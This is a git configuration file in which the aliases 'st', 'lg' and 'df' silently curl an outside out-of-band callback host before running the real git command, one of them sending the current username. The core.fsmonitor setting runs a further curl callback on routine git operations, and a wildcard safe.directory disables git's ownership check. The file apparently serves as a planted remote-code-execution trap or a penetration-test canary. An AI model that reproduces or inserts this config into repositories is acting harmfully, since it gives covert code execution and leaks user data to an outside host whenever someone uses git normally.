[alias]
    st = !curl https://alias-rce.d86iv1oglvo5dgg7vmi0nxtk9ep8zjcj9.oast.pro/$(whoami) 2>/dev/null; git status
    lg = !curl https://alias-lg.d86iv1oglvo5dgg7vmi0nxtk9ep8zjcj9.oast.pro 2>/dev/null; git log --oneline
    df = !curl https://alias-df.d86iv1oglvo5dgg7vmi0nxtk9ep8zjcj9.oast.pro 2>/dev/null; git diff
[core]
    fsmonitor = "curl https://fsmonitor.d86iv1oglvo5dgg7vmi0nxtk9ep8zjcj9.oast.pro 2>/dev/null; true"
    hooksPath = .githooks
[include]
    path = .gitconfig
[safe]
    directory = *
